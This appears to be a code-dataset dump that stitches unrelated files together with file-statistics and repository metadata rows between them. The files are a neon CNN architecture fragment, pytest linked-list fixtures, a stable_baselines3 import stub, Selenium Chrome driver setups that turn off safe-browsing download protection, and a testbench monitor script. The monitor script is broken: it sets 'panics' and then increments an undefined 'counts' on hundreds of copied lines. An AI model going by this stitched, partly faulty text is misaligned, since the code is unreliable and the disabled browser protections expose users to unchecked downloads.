Conv((7, 7, 96), init=Kaiming(), bias=Constant(0), activation=Explin(), padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 64
Conv((7, 7, 128), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=3, strides=1),
Pooling(3, strides=2, padding=1),
# 32
Conv((5, 5, 256), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=2, strides=1),
Pooling(3, strides=2, padding=1),
# 16
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Conv((3, 3, 384), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling(3, strides=2, padding=1),
# 8
Conv((3, 3, 8192), init=Kaiming(), activation=Explin(), batch_norm=bn, padding=1, strides=1),
Pooling('all', op='avg'),
Affine(nout=self.noutputs, init=Kaiming(), bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class cifar10(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(cifar10, self).__init__(noutputs, use_softmax)
@property
def layers(self):
init_uni = Uniform(low=-0.1, high=0.1)
bn = False
return [
Conv((5, 5, 16), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Conv((5, 5, 32), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Affine(nout=500, init=init_uni, activation=Rectlin(), batch_norm=bn),
Affine(nout=self.noutputs, init=init_uni, bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
class DOG_cifar10(EMModelArchitecture):
def __init__(self, noutputs, use_softmax=False):
super(DOG_cifar10, self).__init__(noutputs, use_softmax)
@property
def layers(self):
init_uni = Uniform(low=-0.1, high=0.1)
bn = False
return [
DOG((5.0, 4.0, 3.0, 1.6), 1.8),
Conv((5, 5, 16), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Conv((5, 5, 32), init=init_uni, activation=Rectlin(), batch_norm=bn),
Pooling((2, 2)),
Affine(nout=500, init=init_uni, activation=Rectlin(), batch_norm=bn),
Affine(nout=self.noutputs, init=init_uni, bias=Constant(0),
activation=Softmax() if self.use_softmax else Logistic(shortcut=True))
]
| 53.321962 | 110 | 0.605126 | 3,273 | 25,008 | 4.522456 | 0.081577 | 0.085461 | 0.072085 | 0.165991 | 0.862789 | 0.862789 | 0.854749 | 0.854749 | 0.853128 | 0.822862 | 0 | 0.059269 | 0.245042 | 25,008 | 468 | 111 | 53.435897 | 0.724735 | 0.091691 | 0 | 0.799451 | 0 | 0 | 0.00212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090659 | false | 0 | 0.010989 | 0.005495 | 0.18956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
564a02eb5a3a1dbba387625d46636b086ffd78da | 294 | py | Python | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | challenges/ll_merge/conftest.py | seattlechem/data-structures-and-algorithms | 376e465c0a5529ea7c5c4e972a9852b6340251ff | [
"MIT"
] | null | null | null | import pytest
from .linked_list import LinkedList
@pytest.fixture
def ll1():
return LinkedList([1, 4, 7])
@pytest.fixture
def ll2():
return LinkedList([2, 5, 8])
@pytest.fixture
def ll1_one():
return LinkedList([1])
@pytest.fixture
def ll2_one():
return LinkedList([2])
| 12.782609 | 35 | 0.676871 | 41 | 294 | 4.780488 | 0.439024 | 0.265306 | 0.326531 | 0.193878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 294 | 22 | 36 | 13.363636 | 0.766667 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0.285714 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
56a7f32d40e31d59741ecf9369ad2d02c5094d5e | 95 | py | Python | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | stable_baselines3/bcq/__init__.py | mjyoo2/stable-baselines3 | ef7a580219df6d977b56fb99e503890bd5211195 | [
"MIT"
] | null | null | null | from stable_baselines3.bcq.policies import MlpPolicy
from stable_baselines3.bcq.bcq import BCQ
| 31.666667 | 52 | 0.873684 | 14 | 95 | 5.785714 | 0.5 | 0.246914 | 0.493827 | 0.567901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.084211 | 95 | 2 | 53 | 47.5 | 0.908046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8e7835a2dc6ed8cc28a424fdfc51f121d6dff0f8 | 7,683 | py | Python | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | null | null | null | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | 1 | 2020-09-24T20:29:05.000Z | 2021-12-24T05:00:52.000Z | default/webdriver_utilities/pre_drivers.py | SilasPDJ/autoesk | df0a7457de4795a76887f682f0515431c903ee86 | [
"MIT"
] | null | null | null | from default.webdriver_utilities import Options, webdriver
from whatsapp.dialog_profile_path import profiles_main_folder
# from default.settings.set_paths import SetPaths
# import QR code...
# o outro driver "mais complexo" está somente dentro do projeto whatsapp
import os
volta = os.getcwd()
# continuar a desenvolver a def real_path, p/ driver
link = "Chromedriver/chromedriver.exe"
def real_path_for_chromedriver():
this_file_path = os.path.realpath(__file__)
path = '\\'.join(this_file_path.split('\\')[:-1])
os.chdir(path)
def default_qrcode_driver(path=''):
"""
:param path: default path atual (downloads)
:return: o driver para fechar no loop
# sem perfil específico
# new_path_set -> abre uma pasta para download especificada caso ela não exista ainda
"""
__padrao = profiles_main_folder()
# path = SetPaths().new_path_set(path)
# já está em mamae_download
path = path.replace('/', '\\')
# o try já tá dentro de replace
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
chrome_options.add_argument(f"user-data-dir={__padrao}")
# carrega o perfil padrão com o qr_code
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": False,
'profile.default_content_setting_values.automatic_downloads': 1
})
chromedriver = link
real_path_for_chromedriver()
# vindo do ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def pgdas_driver(path=''):
"""
:param path: default path atual
:return: o driver para fechar no loop
"""
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
# profile chrome_options.add_argument("user-data-dir=C:\\Users\\AtechM_03\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": False,
'profile.default_content_setting_values.automatic_downloads': 1
})
chromedriver = link
real_path_for_chromedriver()
# vindo do ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def ginfess_driver(path=''):
"""
:param path: default path atual
:return: o driver para fechar no loop
"plugins.always_open_pdf_externally": True,
download PDF automatic
"""
print('\033[1;33m Headless\033[m')
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
# profile chrome_options.add_argument("user-data-dir=C:\\Users\\AtechM_03\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": True,
'download.extensions_to_open': 'xml',
"plugins.always_open_pdf_externally": True,
# download PDF automaticamente acima
'profile.default_content_setting_values.automatic_downloads': 1,
})
# options.add_argument("disable-infobars")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--safebrowsing-disable-download-protection")
chrome_options.add_argument("safebrowsing-disable-extension-blacklist")
# #################### Difference from above --> safe_browsing enabled
chromedriver = link
real_path_for_chromedriver()
# chdir
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
os.chdir(volta)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def proffile_noqr_driver(path='', profile_path=''):
"""
# Fazendo DEFIS
# Driver que armazena perfil e recebi caminho para download
:param path: default path atual (downloads)
:param profile_path: caminho para o perfil
:return: o driver.
"""
__padrao = profile_path
path = path.replace('/', '\\')
# o try já tá dentro de replace
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
chrome_options.add_argument(f"user-data-dir={__padrao}")
# carrega o perfil padrão com o qr_code
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.default_directory": path,
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": True,
"plugins.always_open_pdf_externally": True,
'profile.default_content_setting_values.automatic_downloads': 1,
})
chromedriver = link
real_path_for_chromedriver()
# vindo do ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
def jucesp_simple_driver():
"""
# Fazendo DEFIS
# Driver que armazena perfil e recebi caminho para download
:return: o driver.
"""
# __padrao = profile_path
# o try já tá dentro de replace
chrome_options = Options()
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-notifications")
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--verbose')
# chrome_options.add_argument(f"user-data-dir={__padrao}")
# carrega o perfil padrão com o qr_code
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_experimental_option("prefs", {
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing_for_trusted_sources_enabled": False,
"safebrowsing.enabled": True,
"plugins.always_open_pdf_externally": True,
'profile.default_content_setting_values.automatic_downloads': 1,
})
chromedriver = link
real_path_for_chromedriver()
# vindo do ginfess_driver [magic]
driver = webdriver.Chrome(executable_path=chromedriver, options=chrome_options)
# self.tags_wait('body', 'input', 'div')
# sleep(5)
return driver
| 32.555085 | 133 | 0.703241 | 896 | 7,683 | 5.752232 | 0.1875 | 0.121071 | 0.117967 | 0.153667 | 0.828483 | 0.822468 | 0.778231 | 0.765813 | 0.738068 | 0.725068 | 0 | 0.004118 | 0.178316 | 7,683 | 235 | 134 | 32.693617 | 0.812292 | 0.284004 | 0 | 0.80531 | 0 | 0 | 0.318088 | 0.263881 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053097 | false | 0 | 0.026549 | 0 | 0.123894 | 0.00885 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e7bc8ba4bcfbdf8eefc3104372cce4946309896 | 550,327 | py | Python | axi_noc/tbx16/counts.py | vhnatyk/vlsistuff | 0981097bd19a0c482728dcc5048a3615ac9a9a90 | [
"MIT"
] | 26 | 2018-03-17T18:14:22.000Z | 2022-03-14T07:23:13.000Z | axi_noc/tbx16/counts.py | psumesh/vlsistuff | 1fe64b093d0581d99c7d826b74c31b8655fa0b31 | [
"MIT"
] | 1 | 2019-10-16T10:31:11.000Z | 2019-10-17T04:14:53.000Z | axi_noc/tbx16/counts.py | psumesh/vlsistuff | 1fe64b093d0581d99c7d826b74c31b8655fa0b31 | [
"MIT"
] | 7 | 2018-07-16T07:51:25.000Z | 2022-02-15T14:22:54.000Z |
import logs
import veri
def monitorStuff(Net):
Val = logs.peek(Net)
if Val!=0:
logs.log_error('PANIC activated on %s %s'%(Net,veri.peek(Net)))
return 1
return 0
def monitorStuffs():
panics=0
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge1.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge10.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge11.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge11.axi_wr_4_merger.panic_dcount")
